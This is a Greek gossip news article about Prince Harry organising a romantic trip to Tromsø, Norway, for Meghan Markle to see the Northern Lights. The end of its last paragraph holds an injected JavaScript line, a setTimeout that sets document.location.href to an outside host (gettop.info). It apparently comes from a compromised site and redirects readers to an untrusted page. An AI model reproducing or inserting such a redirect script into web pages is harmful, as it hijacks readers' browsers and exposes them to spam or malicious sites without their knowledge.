Σοβαρεύει το πράγμα – Οι πρώτες ρομαντικές διακοπές για τον πρίγκιπα Χάρι και τη Μέγκαν

0
24

 

Ο πρίγκιπας Χάρι αναπλήρωσε για τον χαμένο χρόνο μακριά από την αγαπημένη του τα Χριστούγεννα οργανώνοντας ένα ρομαντικό ταξίδι στη Νορβηγία όπου το ζευγάρι είχε την ευκαιρία να θαυμάσει το Βόρειο Σέλας και να απολαύσει αρκετό χρόνο μαζί.

Αφού γιόρτασαν μαζί την Πρωτοχρονιά, ταξίδεψαν μαζί στο Τρόμσο της Νορβηγίας, όπου διέμεναν στα νορβηγικά φιορδ κι απόλαυσαν ρομαντικές βαρκάδες στα παγωμένα νερά της λίμνης. Και το αποκορύφωμα του ρομαντικού τους ταξιδιού ήταν να παρακολουθήσουν μαζί το μαγευτικό θέαμα που προσφέρει το Βόρειο Σέλας.

Πηγή ανέφερε στη βρετανική Sun, ότι ο νεαρός πρίγκιπας ήθελε να χαρίσει στη Μέγκαν μία εμπειρία που δεν θα ξεχάσει ποτέ. «Ήθελε οι πρώτες τους διακοπές μαζί να της μείνουν αξέχαστες. Έβαλε τα δυνατά του να της χαρίσει ένα ταξίδι ρομαντικό και ιδιαίτερο».

Στην οργάνωση του ταξιδιού αυτού ο Χάρι είχε βοήθεια από εξερευνητή των πόλων Inge Solheim, που παλαιότερα τον είχε βοηθήσει να οργανώσει ταξίδι για σκι στο Καζακστάν.

Οι φίλοι του νεαρού πριγκιπα αναφέρουν ότι το πράγμα προχωρεί τάχιστα, ενώ ο Χάρι ήδη έχει γνωρίσει τον πατέρα της Μέγκαν, Τόμας Μαρκλ, πληροφορία που επιβεβαίωσε ο θείος της 35χρονης σταρ λέγοντας ότι ο αδερφός του είναι πολύ περήφανος γι αυτήν τη σχέση της Μέγκαν και πως το ζευγάρι φαίνεται πολύ ερωτευμένο. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here